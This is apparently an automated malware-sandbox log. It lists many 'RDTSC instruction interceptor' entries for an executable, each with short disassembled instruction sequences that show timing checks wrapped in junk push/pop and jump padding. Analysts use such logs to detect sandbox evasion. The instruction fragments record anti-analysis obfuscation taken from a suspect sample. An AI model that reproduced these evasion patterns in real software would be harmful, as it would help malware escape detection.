Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 135456B second address: 13545A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F474D52716Ch 0x00000008 jnc 00007F474D527166h 0x0000000e jmp 00007F474D527178h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push edx 0x00000019 pop edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 13584FC second address: 1358500 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 1358500 second address: 135850C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 135850C second address: 1358510 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 13577FA second address: 1357800 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 1357800 second address: 1357804 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 1357964 second address: 13579A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F474D527173h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d push ecx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 jmp 00007F474D52716Ch 0x00000015 pop ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F474D527174h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 13579A7 second address: 13579AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 13581C0 second address: 13581CA instructions: 0x00000000 rdtsc 0x00000002 jo 00007F474D52716Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12B5407 second address: 12B5418 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 jo 00007F474CE3960Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12B5418 second address: 12B543E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F474D527170h 0x00000009 jmp 00007F474D52716Fh 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 135F1AE second address: 135F1B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 135F1B2 second address: 135F1C3 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F474D527166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 135F566 second address: 135F56A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 135F56A second address: 135F56E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 135F56E second address: 135F580 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F474CE395F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 135F863 second address: 135F869 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 135F869 second address: 135F86F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 135F86F second address: 135F8A4 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F474D52717Dh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jl 00007F474D527194h 0x00000010 pushad 0x00000011 jmp 00007F474D52716Bh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 135FA08 second address: 135FA0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 135FA0E second address: 135FA1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ebx 0x00000006 jg 00007F474D527179h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 135FB53 second address: 135FB64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f pop eax 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 135FB64 second address: 135FB88 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F474D527174h 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007F474D527166h 0x0000000f jng 00007F474D527166h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 135FB88 second address: 135FB8E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 135FCDD second address: 135FCE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 13606FB second address: 1360701 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 1360E6C second address: 1360E70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 1360E70 second address: 1360E74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 135ED4F second address: 135ED59 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 13672CA second address: 13672D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 13742C8 second address: 13742CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 1373FB1 second address: 1373FB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 1377F89 second address: 1377F8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 1377F8F second address: 1377F96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 1388416 second address: 1388431 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F474D52716Bh 0x00000009 jc 00007F474D52716Ch 0x0000000f rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 1388431 second address: 1388466 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 je 00007F474CE395F6h 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 jmp 00007F474CE39602h 0x0000001a pushad 0x0000001b jmp 00007F474CE395FBh 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 138B873 second address: 138B87D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F474D527166h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 138B87D second address: 138B8B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F474CE39603h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jmp 00007F474CE39606h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 138B8B5 second address: 138B8B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 1394A27 second address: 1394A5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F474CE39602h 0x00000009 jmp 00007F474CE39607h 0x0000000e push eax 0x0000000f push edx 0x00000010 jbe 00007F474CE395F6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 1394A5E second address: 1394A62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 1393134 second address: 139314F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 je 00007F474CE395F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jo 00007F474CE395F6h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 popad 0x00000016 pushad 0x00000017 push edx 0x00000018 pop edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 139314F second address: 1393168 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F474D52716Eh 0x00000009 popad 0x0000000a popad 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 1393168 second address: 139316E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 139316E second address: 1393172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 13932E9 second address: 1393311 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F474CE3960Fh 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 139346F second address: 139347B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 1393604 second address: 139360A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 139360A second address: 1393644 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F474D527166h 0x00000008 jmp 00007F474D52716Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jne 00007F474D527166h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 pushad 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c jmp 00007F474D527170h 0x00000021 push edx 0x00000022 pop edx 0x00000023 popad 0x00000024 popad 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 1393644 second address: 1393657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F474CE395FCh 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 1393A3B second address: 1393A9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jne 00007F474D527166h 0x0000000c jmp 00007F474D527176h 0x00000011 jmp 00007F474D527176h 0x00000016 popad 0x00000017 popad 0x00000018 pushad 0x00000019 push ecx 0x0000001a pushad 0x0000001b popad 0x0000001c push edi 0x0000001d pop edi 0x0000001e pop ecx 0x0000001f jc 00007F474D527182h 0x00000025 jmp 00007F474D527176h 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 139A869 second address: 139A86D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 139A86D second address: 139A877 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F474D527166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 139A877 second address: 139A883 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F474CE395FEh 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 139A883 second address: 139A88C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 139D032 second address: 139D037 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 139D037 second address: 139D03D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 139D03D second address: 139D041 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 139D041 second address: 139D05B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F474D527176h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 13D865E second address: 13D8664 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 13E6508 second address: 13E650C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 13EB77E second address: 13EB782 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 13EB782 second address: 13EB78C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 13EB78C second address: 13EB7A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F474CE39601h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 13EB7A1 second address: 13EB7A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 14B0DA7 second address: 14B0DAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 14B0DAF second address: 14B0DB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 14B0DB6 second address: 14B0DD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 jl 00007F474CE395F8h 0x0000000e pushad 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jbe 00007F474CE395FEh 0x0000001a push edx 0x0000001b pop edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 14B0DD4 second address: 14B0DD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 14B0DD8 second address: 14B0DEE instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F474CE395FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007F474CE395F6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 14AFC1B second address: 14AFC25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F474D527166h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 14B0480 second address: 14B0485 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 14B060F second address: 14B0634 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F474D527178h 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F474D527166h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 14B0634 second address: 14B0643 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F474CE395F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 14B0643 second address: 14B0649 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 14B07AA second address: 14B07C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F474CE39603h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push esi 0x0000000d pop esi 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 14B07C7 second address: 14B07DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F474D52716Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007F474D527166h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 14B07DF second address: 14B080B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F474CE39603h 0x00000007 jg 00007F474CE395F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push ebx 0x00000013 jng 00007F474CE395F6h 0x00000019 pop ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 14B099B second address: 14B09A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F474D527166h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 14B514F second address: 14B5169 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F474CE395F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F474CE395FEh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 14B5169 second address: 14B51C8 instructions: 0x00000000 rdtsc 0x00000002 js 00007F474D527166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c jmp 00007F474D52716Fh 0x00000011 mov dword ptr [ebp+12A233A2h], edx 0x00000017 push 00000004h 0x00000019 push edx 0x0000001a pop edx 0x0000001b mov edx, dword ptr [ebp+12A22CB4h] 0x00000021 call 00007F474D527169h 0x00000026 jl 00007F474D52716Eh 0x0000002c jl 00007F474D527168h 0x00000032 push ebx 0x00000033 pop ebx 0x00000034 push eax 0x00000035 jmp 00007F474D52716Ch 0x0000003a mov eax, dword ptr [esp+04h] 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F474D52716Ah 0x00000045 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 14B51C8 second address: 14B521B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F474CE39601h 0x00000008 jmp 00007F474CE395FAh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [eax] 0x00000012 pushad 0x00000013 pushad 0x00000014 push eax 0x00000015 pop eax 0x00000016 jmp 00007F474CE395FCh 0x0000001b popad 0x0000001c push eax 0x0000001d push edi 0x0000001e pop edi 0x0000001f pop eax 0x00000020 popad 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 pushad 0x00000026 js 00007F474CE395F8h 0x0000002c push edx 0x0000002d pop edx 0x0000002e pushad 0x0000002f jmp 00007F474CE395FAh 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 14B54EB second address: 14B552D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F474D52716Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c xor edx, 34380BA8h 0x00000012 jng 00007F474D52716Ch 0x00000018 mov dword ptr [ebp+12A224C1h], ebx 0x0000001e push dword ptr [ebp+12A217FBh] 0x00000024 mov edx, dword ptr [ebp+12A229A8h] 0x0000002a push D9D8EE71h 0x0000002f pushad 0x00000030 push edi 0x00000031 pushad 0x00000032 popad 0x00000033 pop edi 0x00000034 jbe 00007F474D52716Ch 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 14B6877 second address: 14B688A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F474CE395FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 14B688A second address: 14B688E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 14B8576 second address: 14B859C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F474CE39608h 0x00000009 pop edx 0x0000000a pushad 0x0000000b jns 00007F474CE395F6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 14B859C second address: 14B85A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 14B810A second address: 14B8121 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F474CE39601h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 14B8121 second address: 14B8125 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
